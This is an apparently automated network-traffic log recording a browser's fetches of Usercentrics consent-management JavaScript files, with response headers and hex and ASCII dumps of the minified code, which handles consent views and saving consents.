2024-04-18 17:39:33 UTC	1255	IN	Data Raw: 28 28 29 3d 3e 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 72 2c 6e 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 67 65 74 3a 72 2c 73 65 74 3a 6e 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 7d 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 7b 7d 2c 72 3d 7b 7d 2c 6e 3d 7b 7d Data Ascii: (()=>{function e(e,t,r,n){Object.defineProperty(e,t,{get:r,set:n,enumerable:!0,configurable:!0})}var t="undefined"!=typeof globalThis?globalThis:"undefined"!=typeof self?self:"undefined"!=typeof window?window:"undefined"!=typeof global?global:{},r={},n={}
2024-04-18 17:39:33 UTC	1255	IN	Data Raw: 73 69 6f 6e 29 3a 5c 2f 5c 2f 2e 2b 29 5c 2f 5b 5e 2f 5d 2b 24 2f 2c 22 24 31 22 29 2b 22 2f 22 7d 72 65 74 75 72 6e 22 2f 22 7d 28 29 2c 6f 5b 65 5d 3d 74 29 2c 74 7d 7d 29 2c 61 28 22 57 61 48 71 34 22 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 65 2e 65 78 70 6f 72 74 73 3d 6f 28 22 69 77 45 52 4e 22 29 28 6f 28 22 6c 48 38 73 48 22 29 2e 72 65 73 6f 6c 76 65 28 22 35 79 63 45 51 22 29 29 2e 74 68 65 6e 28 28 29 3d 3e 6f 28 22 63 31 45 5a 6e 22 29 29 7d 29 2c 61 28 22 69 77 45 52 4e 22 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 6f 28 22 6c 38 76 31 6f 22 29 3b 65 2e 65 78 70 6f 72 74 73 3d 72 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 69 Data Ascii: sion):\/\/.+)\/[^/]+$/,"$1")+"/"}return"/"}(),o[e]=t),t}}),a("WaHq4",function(e,t){e.exports=o("iwERN")(o("lH8sH").resolve("5ycEQ")).then(()=>o("c1EZn"))}),a("iwERN",function(e,t){var r=o("l8v1o");e.exports=r(function(e){return new Promise(function(t,r){i
2024-04-18 17:39:33 UTC	304	IN	Data Raw: 31 39 2e 6a 73 22 2c 22 69 55 38 63 35 22 2c 22 76 2f 33 2e 31 32 2e 31 2f 53 65 72 76 69 63 65 44 65 74 61 69 6c 73 56 69 65 77 2e 66 32 30 39 62 63 63 62 2e 6a 73 22 2c 22 38 42 47 69 76 22 2c 22 76 2f 33 2e 31 32 2e 31 2f 4d 6f 64 61 6c 56 69 65 77 2e 32 38 65 35 32 66 32 39 2e 6a 73 22 2c 22 69 77 76 54 75 22 2c 22 76 2f 33 2e 31 32 2e 31 2f 43 61 74 65 67 6f 72 79 44 65 74 61 69 6c 73 56 69 65 77 2e 34 38 34 66 64 61 39 31 2e 6a 73 22 2c 22 64 59 52 35 45 22 2c 22 76 2f 33 2e 31 32 2e 31 2f 73 65 63 74 69 6f 6e 73 2e 64 32 30 35 37 32 39 64 2e 6a 73 22 2c 22 32 36 67 39 76 22 2c 22 76 2f 33 2e 31 32 2e 31 2f 73 70 61 74 69 61 6c 4e 61 76 69 67 61 74 69 6f 6e 2e 33 65 64 63 38 35 31 66 2e 6a 73 22 2c 22 61 6a 4d 51 61 22 2c 22 76 2f 33 2e 31 32 2e 31 Data Ascii: 19.js","iU8c5","v/3.12.1/ServiceDetailsView.f209bccb.js","8BGiv","v/3.12.1/ModalView.28e52f29.js","iwvTu","v/3.12.1/CategoryDetailsView.484fda91.js","dYR5E","v/3.12.1/sections.d205729d.js","26g9v","v/3.12.1/spatialNavigation.3edc851f.js","ajMQa","v/3.12.1
2024-04-18 17:39:33 UTC	1255	IN	Data Raw: 32 2e 31 2f 43 62 47 64 70 72 43 6d 70 56 69 65 77 2e 39 61 61 39 30 35 33 38 2e 6a 73 22 2c 22 39 58 58 37 43 22 2c 22 76 2f 33 2e 31 32 2e 31 2f 55 63 47 64 70 72 43 6d 70 56 69 65 77 2e 35 63 61 62 66 33 61 30 2e 6a 73 22 2c 22 6b 52 45 58 33 22 2c 22 76 2f 33 2e 31 32 2e 31 2f 55 63 43 63 70 61 43 6d 70 56 69 65 77 2e 61 30 39 32 66 64 38 31 2e 6a 73 22 2c 22 67 58 52 34 59 22 2c 22 76 2f 33 2e 31 32 2e 31 2f 54 76 54 63 66 43 6d 70 56 69 65 77 2e 37 63 32 35 38 30 34 32 2e 6a 73 22 2c 22 63 71 4a 36 41 22 2c 22 76 2f 33 2e 31 32 2e 31 2f 56 65 6e 64 6f 72 44 65 74 61 69 6c 73 56 69 65 77 2e 35 35 31 39 32 63 39 37 2e 6a 73 22 2c 22 35 42 45 4f 63 22 2c 22 76 2f 33 2e 31 32 2e 31 2f 55 63 54 63 66 43 6d 70 56 69 65 77 2e 31 66 33 34 64 39 64 62 2e 6a Data Ascii: 2.1/CbGdprCmpView.9aa90538.js","9XX7C","v/3.12.1/UcGdprCmpView.5cabf3a0.js","kREX3","v/3.12.1/UcCcpaCmpView.a092fd81.js","gXR4Y","v/3.12.1/TvTcfCmpView.7c258042.js","cqJ6A","v/3.12.1/VendorDetailsView.55192c97.js","5BEOc","v/3.12.1/UcTcfCmpView.1f34d9db.j
2024-04-18 17:39:33 UTC	1111	IN	Data Raw: 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 4e 6f 64 65 4c 69 73 74 26 26 21 4e 6f 64 65 4c 69 73 74 2e 70 72 6f 74 6f 74 79 70 65 2e 66 6f 72 45 61 63 68 26 26 28 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 50 6f 6c 79 66 69 6c 6c 20 4e 6f 64 65 6c 69 73 74 2e 66 6f 72 45 61 63 68 22 29 2c 4e 6f 64 65 4c 69 73 74 2e 70 72 6f 74 6f 74 79 70 65 2e 66 6f 72 45 61 63 68 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 3d 74 7c 7c 77 69 6e 64 6f 77 3b 66 6f 72 28 6c 65 74 20 72 3d 30 3b 72 3c 74 68 69 73 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 65 2e 63 61 6c 6c 28 74 2c 74 68 69 73 5b 72 5d 2c 72 2c 74 68 69 73 29 7d 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e Data Ascii: ned"!=typeof window&&window.NodeList&&!NodeList.prototype.forEach&&(console.log("Polyfill Nodelist.forEach"),NodeList.prototype.forEach=function(e,t){t=t\|\|window;for(let r=0;r<this.length;r++)e.call(t,this[r],r,this)}),function(e){e.forEach(function(e){e.

Timestamp	Bytes transferred	Direction	Data
2024-04-18 17:39:33 UTC	630	OUT	GET /ui/v/3.12.1/cmp.cd839b23.js HTTP/1.1 Host: web.cmp.usercentrics.eu Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://www.jimdo.com/?utm_source=dol-doc-36%20en-US&utm_medium=footer%20ad&utm_campaign=ownads%20webview Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 17:39:33 UTC	938	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ABPtcPoj3nENI7bgT42hLXK8KfyMDLk3tX_vRQhyreATclNR4DRUq50McyyRMDb7iTRZhYqPSNk Date: Thu, 18 Apr 2024 17:39:33 GMT Cache-Control: public, max-age=31536000 Expires: Fri, 18 Apr 2025 17:39:33 GMT Last-Modified: Thu, 11 Apr 2024 08:55:31 GMT ETag: "b1760578514eb595c91d4641d54e16c0" x-goog-generation: 1712825731899113 x-goog-metageneration: 2 x-goog-stored-content-encoding: identity x-goog-stored-content-length: 30901 Content-Type: application/javascript x-goog-hash: crc32c=oAP6DQ== x-goog-hash: md5=sXYFeFFOtZXJHUZB1U4WwA== x-goog-storage-class: STANDARD Accept-Ranges: bytes Content-Length: 30901 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: * Server: UploadServer Vary: Accept-Encoding Strict-Transport-Security: max-age=31536000; includeSubDomains X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-18 17:39:33 UTC	1255	IN	Data Raw: 28 28 29 3d 3e 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 72 2c 6e 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 67 65 74 3a 72 2c 73 65 74 3a 6e 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 7d 76 61 72 20 74 3d 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 7b 7d 29 2e 70 61 72 63 65 6c 52 Data Ascii: (()=>{function e(e,t,r,n){Object.defineProperty(e,t,{get:r,set:n,enumerable:!0,configurable:!0})}var t=("undefined"!=typeof globalThis?globalThis:"undefined"!=typeof self?self:"undefined"!=typeof window?window:"undefined"!=typeof global?global:{}).parcelR
2024-04-18 17:39:33 UTC	1255	IN	Data Raw: 26 26 7b 65 75 4d 6f 64 65 3a 62 7d 2c 77 26 26 77 2e 6c 65 6e 67 74 68 26 26 7b 6c 6f 63 61 74 69 6f 6e 3a 7b 63 6f 75 6e 74 72 79 3a 77 5b 30 5d 2c 72 65 67 69 6f 6e 3a 77 5b 31 5d 2c 63 69 74 79 3a 77 5b 32 5d 7d 7d 29 2c 79 3d 6e 65 77 28 79 69 65 6c 64 28 30 2c 43 2e 6c 61 7a 79 4d 6f 64 75 6c 65 73 29 2e 67 65 74 42 72 6f 77 73 65 72 53 64 6b 28 29 29 28 54 29 3b 74 72 79 7b 72 3d 79 69 65 6c 64 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 65 3d 3e 7b 69 66 28 6e 29 65 28 79 2e 69 6e 69 74 42 79 52 75 6c 65 53 65 74 28 6e 2c 69 29 29 3b 65 6c 73 65 20 69 66 28 6f 29 65 28 79 2e 69 6e 69 74 42 79 53 65 74 74 69 6e 67 28 6f 2c 69 29 29 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 22 55 73 65 72 63 65 6e 74 72 69 63 73 3a 20 62 61 64 20 73 63 72 69 Data Ascii: &&{euMode:b},w&&w.length&&{location:{country:w[0],region:w[1],city:w[2]}}),y=new(yield(0,C.lazyModules).getBrowserSdk())(T);try{r=yield new Promise(e=>{if(n)e(y.initByRuleSet(n,i));else if(o)e(y.initBySetting(o,i));else throw Error("Usercentrics: bad scri
2024-04-18 17:39:33 UTC	252	IN	Data Raw: 43 5f 55 49 3d 6e 65 77 20 61 2e 55 63 55 69 28 72 29 2c 28 30 2c 70 2e 63 6d 70 45 76 65 6e 74 73 29 2e 65 6d 69 74 28 22 49 4e 49 54 5f 43 4f 4d 50 4c 45 54 45 22 29 2c 28 30 2c 64 2e 56 32 42 72 69 64 67 65 43 75 73 74 6f 6d 45 76 65 6e 74 73 29 2e 64 69 73 70 61 74 63 68 55 63 55 69 49 6e 69 74 43 6f 6d 70 6c 65 74 65 28 29 7d 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 7d 29 2c 72 28 22 69 4b 6d 44 4f 22 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 65 2c 74 2c 72 2c 6e 2c 6f 2c 69 2c 73 29 7b 74 72 79 7b 76 61 72 20 63 3d 65 5b 69 5d 28 73 29 2c 6c 3d 63 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 65 29 7b 72 28 65 29 3b 72 Data Ascii: C_UI=new a.UcUi(r),(0,p.cmpEvents).emit("INIT_COMPLETE"),(0,d.V2BridgeCustomEvents).dispatchUcUiInitComplete()}),function(){return o.apply(this,arguments)})}),r("iKmDO",function(t,r){function n(e,t,r,n,o,i,s){try{var c=e[i](s),l=c.value}catch(e){r(e);r
2024-04-18 17:39:34 UTC	1255	IN	Data Raw: 65 74 75 72 6e 7d 63 2e 64 6f 6e 65 3f 74 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6e 2c 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2c 72 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 69 29 7b 76 61 72 20 73 3d 65 2e 61 70 70 6c 79 28 74 2c 72 29 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 6e 28 73 2c 6f 2c 69 2c 63 2c 6c 2c 22 6e 65 78 74 22 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65 29 7b 6e 28 73 2c 6f 2c 69 2c 63 2c 6c 2c 22 74 68 72 6f 77 22 2c 65 29 7d 63 28 76 6f 69 64 20 30 29 7d 29 7d 7d 65 28 74 2e 65 78 70 6f 72 74 73 2c 22 5f 22 Data Ascii: eturn}c.done?t(l):Promise.resolve(l).then(n,o)}function o(e){return function(){var t=this,r=arguments;return new Promise(function(o,i){var s=e.apply(t,r);function c(e){n(s,o,i,c,l,"next",e)}function l(e){n(s,o,i,c,l,"throw",e)}c(void 0)})}}e(t.exports,"_"
2024-04-18 17:39:34 UTC	1255	IN	Data Raw: 74 65 6e 64 73 20 6e 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 29 7b 73 75 70 65 72 28 22 43 4d 50 5f 4e 4f 54 5f 41 4c 4c 4f 57 45 44 22 29 2c 74 68 69 73 2e 64 61 74 61 3d 7b 73 68 6f 77 4e 6f 74 41 6c 6c 6f 77 65 64 49 6e 66 6f 3a 65 7d 7d 7d 6c 65 74 20 73 3d 65 3d 3e 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 43 4d 50 5f 4e 4f 54 5f 41 4c 4c 4f 57 45 44 22 3d 3d 3d 65 2e 6e 61 6d 65 2c 63 3d 65 3d 3e 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 43 4d 50 5f 56 45 52 53 49 4f 4e 5f 4d 49 53 4d 41 54 43 48 22 3d 3d 3d 65 2e 6e 61 6d 65 7d 29 2c 72 28 22 68 63 4e 63 63 22 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 76 61 72 20 6e 2c 6f 2c 69 2c 73 3b 65 28 74 2e 65 78 70 6f 72 74 73 2c 22 45 4d 42 45 44 44 49 4e 47 Data Ascii: tends n{constructor(e){super("CMP_NOT_ALLOWED"),this.data={showNotAllowedInfo:e}}}let s=e=>"object"==typeof e&&"CMP_NOT_ALLOWED"===e.name,c=e=>"object"==typeof e&&"CMP_VERSION_MISMATCH"===e.name}),r("hcNcc",function(t,r){var n,o,i,s;e(t.exports,"EMBEDDING
2024-04-18 17:39:34 UTC	1255	IN	Data Raw: 73 65 74 56 69 65 77 28 28 79 69 65 6c 64 28 30 2c 63 2e 6c 61 7a 79 4d 6f 64 75 6c 65 73 29 2e 67 65 74 47 64 70 72 56 69 65 77 28 65 2e 63 6d 70 43 6f 6e 74 72 6f 6c 6c 65 72 29 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 54 43 46 22 3a 28 30 2c 73 2e 69 73 54 63 66 43 6d 70 43 6f 6e 74 72 6f 6c 6c 65 72 29 28 65 2e 63 6d 70 43 6f 6e 74 72 6f 6c 6c 65 72 29 26 26 65 2e 73 65 74 56 69 65 77 28 28 79 69 65 6c 64 28 30 2c 63 2e 6c 61 7a 79 4d 6f 64 75 6c 65 73 29 2e 67 65 74 54 63 66 56 69 65 77 28 65 2e 63 6d 70 43 6f 6e 74 72 6f 6c 6c 65 72 29 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 43 43 50 41 22 3a 28 30 2c 73 2e 69 73 43 63 70 61 43 6d 70 43 6f 6e 74 72 6f 6c 6c 65 72 29 28 65 2e 63 6d 70 43 6f 6e 74 72 6f 6c 6c 65 72 29 26 26 65 2e 73 65 74 56 69 65 Data Ascii: setView((yield(0,c.lazyModules).getGdprView(e.cmpController)));break;case"TCF":(0,s.isTcfCmpController)(e.cmpController)&&e.setView((yield(0,c.lazyModules).getTcfView(e.cmpController)));break;case"CCPA":(0,s.isCcpaCmpController)(e.cmpController)&&e.setVie
2024-04-18 17:39:34 UTC	331	IN	Data Raw: 69 64 20 30 3d 3d 3d 74 7c 7c 74 2e 63 6c 6f 73 65 43 6d 70 28 29 7d 29 28 29 7d 67 65 74 43 6f 6e 73 65 6e 74 44 65 74 61 69 6c 73 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 72 65 74 75 72 6e 28 30 2c 6f 2e 5f 29 28 66 75 6e 63 74 69 6f 6e 2a 28 29 7b 72 65 74 75 72 6e 20 65 2e 63 6d 70 43 6f 6e 74 72 6f 6c 6c 65 72 2e 67 65 74 43 6f 6e 73 65 6e 74 44 65 74 61 69 6c 73 28 29 7d 29 28 29 7d 61 63 63 65 70 74 41 6c 6c 43 6f 6e 73 65 6e 74 73 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 72 65 74 75 72 6e 28 30 2c 6f 2e 5f 29 28 66 75 6e 63 74 69 6f 6e 2a 28 29 7b 76 61 72 20 74 2c 72 3b 79 69 65 6c 64 20 65 2e 63 6d 70 43 6f 6e 74 72 6f 6c 6c 65 72 2e 61 63 63 65 70 74 41 6c 6c 43 6f 6e 73 65 6e 74 73 28 29 2c 65 2e 63 6d 70 43 6f 6e 74 72 6f 6c 6c 65 72 2e 73 Data Ascii: id 0===t\|\|t.closeCmp()})()}getConsentDetails(){var e=this;return(0,o._)(function(){return e.cmpController.getConsentDetails()})()}acceptAllConsents(){var e=this;return(0,o._)(function(){var t,r;yield e.cmpController.acceptAllConsents(),e.cmpController.s
2024-04-18 17:39:34 UTC	1255	IN	Data Raw: 6c 65 72 29 28 65 2e 63 6d 70 43 6f 6e 74 72 6f 6c 6c 65 72 29 26 26 65 2e 63 6d 70 43 6f 6e 74 72 6f 6c 6c 65 72 2e 74 63 66 2e 75 70 64 61 74 65 43 6f 6e 73 65 6e 74 53 63 72 65 65 6e 28 6e 75 6c 6c 21 3d 3d 28 72 3d 6e 75 6c 6c 3d 3d 3d 28 74 3d 65 2e 63 6d 70 56 69 65 77 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 67 65 74 43 6f 6e 73 65 6e 74 53 63 72 65 65 6e 28 29 29 26 26 76 6f 69 64 20 30 21 3d 3d 72 3f 72 3a 30 29 2c 79 69 65 6c 64 20 65 2e 63 6d 70 43 6f 6e 74 72 6f 6c 6c 65 72 2e 73 61 76 65 43 6f 6e 73 65 6e 74 73 28 29 7d 29 28 29 7d 64 65 6e 79 41 6c 6c 43 6f 6e 73 65 6e 74 73 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 72 65 74 75 72 6e 28 30 2c 6f 2e 5f 29 28 66 75 6e 63 74 69 6f 6e 2a 28 29 7b 76 61 72 20 74 2c 72 Data Ascii: ler)(e.cmpController)&&e.cmpController.tcf.updateConsentScreen(null!==(r=null===(t=e.cmpView)\|\|void 0===t?void 0:t.getConsentScreen())&&void 0!==r?r:0),yield e.cmpController.saveConsents()})()}denyAllConsents(){var e=this;return(0,o._)(function*(){var t,r
2024-04-18 17:39:34 UTC	1255	IN	Data Raw: 6f 6e 73 65 6e 74 28 65 2e 73 70 65 63 69 61 6c 46 65 61 74 75 72 65 73 29 29 7d 29 28 29 7d 73 61 76 65 43 6f 6e 73 65 6e 74 73 28 65 3d 22 45 58 50 4c 49 43 49 54 22 29 7b 76 61 72 20 74 3d 74 68 69 73 3b 72 65 74 75 72 6e 28 30 2c 6f 2e 5f 29 28 66 75 6e 63 74 69 6f 6e 2a 28 29 7b 76 61 72 20 72 2c 6e 3b 74 2e 63 6d 70 43 6f 6e 74 72 6f 6c 6c 65 72 2e 73 65 74 41 6e 61 6c 79 74 69 63 73 50 69 78 65 6c 28 69 2e 43 4d 50 5f 45 56 45 4e 54 5f 54 59 50 45 2e 53 41 56 45 2c 22 5f 5f 75 63 43 6d 70 22 29 2c 28 30 2c 73 2e 69 73 54 63 66 43 6d 70 43 6f 6e 74 72 6f 6c 6c 65 72 29 28 74 2e 63 6d 70 43 6f 6e 74 72 6f 6c 6c 65 72 29 26 26 74 2e 63 6d 70 43 6f 6e 74 72 6f 6c 6c 65 72 2e 74 63 66 2e 75 70 64 61 74 65 43 6f 6e 73 65 6e 74 53 63 72 65 65 6e 28 6e 75 Data Ascii: onsent(e.specialFeatures))})()}saveConsents(e="EXPLICIT"){var t=this;return(0,o._)(function*(){var r,n;t.cmpController.setAnalyticsPixel(i.CMP_EVENT_TYPE.SAVE,"__ucCmp"),(0,s.isTcfCmpController)(t.cmpController)&&t.cmpController.tcf.updateConsentScreen(nu
2024-04-18 17:39:34 UTC	1255	IN	Data Raw: 6f 2e 50 52 49 56 41 43 59 5f 50 4f 4c 49 43 59 5f 4c 49 4e 4b 3d 22 50 52 49 56 41 43 59 5f 50 4f 4c 49 43 59 5f 4c 49 4e 4b 22 2c 6f 2e 43 43 50 41 5f 54 4f 47 47 4c 45 53 5f 4f 4e 3d 22 43 43 50 41 5f 54 4f 47 47 4c 45 53 5f 4f 4e 22 2c 6f 2e 43 43 50 41 5f 54 4f 47 47 4c 45 53 5f 4f 46 46 3d 22 43 43 50 41 5f 54 4f 47 47 4c 45 53 5f 4f 46 46 22 2c 6f 2e 53 41 59 5f 4d 49 4e 45 5f 4c 49 4e 4b 3d 22 53 41 59 5f 4d 49 4e 45 5f 4c 49 4e 4b 22 7d 29 2c 72 28 22 62 6d 4e 63 79 22 2c 66 75 6e 63 74 69 6f 6e 28 72 2c 6e 29 7b 65 28 72 2e 65 78 70 6f 72 74 73 2c 22 62 72 6f 77 73 65 72 53 64 6b 45 76 65 6e 74 73 22 2c 28 29 3d 3e 74 28 22 63 69 6b 38 33 22 29 2e 62 72 6f 77 73 65 72 53 64 6b 45 76 65 6e 74 73 29 2c 65 28 72 2e 65 78 70 6f 72 74 73 2c 22 43 4d Data Ascii: o.PRIVACY_POLICY_LINK="PRIVACY_POLICY_LINK",o.CCPA_TOGGLES_ON="CCPA_TOGGLES_ON",o.CCPA_TOGGLES_OFF="CCPA_TOGGLES_OFF",o.SAY_MINE_LINK="SAY_MINE_LINK"}),r("bmNcy",function(r,n){e(r.exports,"browserSdkEvents",()=>t("cik83").browserSdkEvents),e(r.exports,"CM

Timestamp	Bytes transferred	Direction	Data
2024-04-18 17:39:34 UTC	641	OUT	GET /ui/v/3.12.1/BrowserSdk.lib.7fd92bef.js HTTP/1.1 Host: web.cmp.usercentrics.eu Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://www.jimdo.com/?utm_source=dol-doc-36%20en-US&utm_medium=footer%20ad&utm_campaign=ownads%20webview Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 17:39:35 UTC	937	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ABPtcPqQhCa9fkouUgTzprEbZwkOZY-u4Bt6I0V03zf2YWAZBM0_FB_QZS7AI-K1PLLLgooNdQ Date: Thu, 18 Apr 2024 17:39:34 GMT Cache-Control: public, max-age=31536000 Expires: Fri, 18 Apr 2025 17:39:34 GMT Last-Modified: Thu, 11 Apr 2024 08:55:31 GMT ETag: "e83f78ccaa75a4bf9767a415f2752e97" x-goog-generation: 1712825731742320 x-goog-metageneration: 2 x-goog-stored-content-encoding: identity x-goog-stored-content-length: 51984 Content-Type: application/javascript x-goog-hash: crc32c=Preb9w== x-goog-hash: md5=6D94zKp1pL+XZ6QV8nUulw== x-goog-storage-class: STANDARD Accept-Ranges: bytes Content-Length: 51984 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: * Server: UploadServer Vary: Accept-Encoding Strict-Transport-Security: max-age=31536000; includeSubDomains X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-18 17:39:35 UTC	1255	IN	Data Raw: 28 28 29 3d 3e 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 2c 65 2c 6e 2c 72 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 65 2c 7b 67 65 74 3a 6e 2c 73 65 74 3a 72 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 7d 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 7b 7d 2c 6e 3d 65 2e 70 61 72 63 65 Data Ascii: (()=>{function t(t,e,n,r){Object.defineProperty(t,e,{get:n,set:r,enumerable:!0,configurable:!0})}var e="undefined"!=typeof globalThis?globalThis:"undefined"!=typeof self?self:"undefined"!=typeof window?window:"undefined"!=typeof global?global:{},n=e.parce
2024-04-18 17:39:35 UTC	1255	IN	Data Raw: 74 29 3b 69 66 28 79 69 65 6c 64 20 65 2e 69 6e 69 74 28 29 29 72 65 74 75 72 6e 20 65 7d 29 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 69 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 3b 63 6c 61 73 73 20 4f 7b 69 6e 69 74 42 79 52 75 6c 65 53 65 74 28 74 2c 65 29 7b 76 61 72 20 6e 3d 74 68 69 73 3b 72 65 74 75 72 6e 28 30 2c 73 2e 5f 29 28 66 75 6e 63 74 69 6f 6e 2a 28 29 7b 6c 65 74 20 72 3b 28 30 2c 53 2e 62 72 6f 77 73 65 72 53 64 6b 45 76 65 6e 74 73 29 2e 65 6d 69 74 28 22 49 4e 49 54 5f 41 43 54 49 4f 4e 22 2c 7b 69 6e 69 74 42 79 52 75 6c 65 53 65 74 3a 74 7d 29 3b 6c 65 74 20 69 3d 79 69 65 6c 64 20 6e 2e 61 70 69 53 65 72 76 69 63 65 2e 66 65 74 63 68 49 6e 69 74 44 61 74 61 42 79 52 75 6c 65 53 65 74 Data Ascii: t);if(yield e.init())return e}),function(t){return i.apply(this,arguments)});class O{initByRuleSet(t,e){var n=this;return(0,s._)(function*(){let 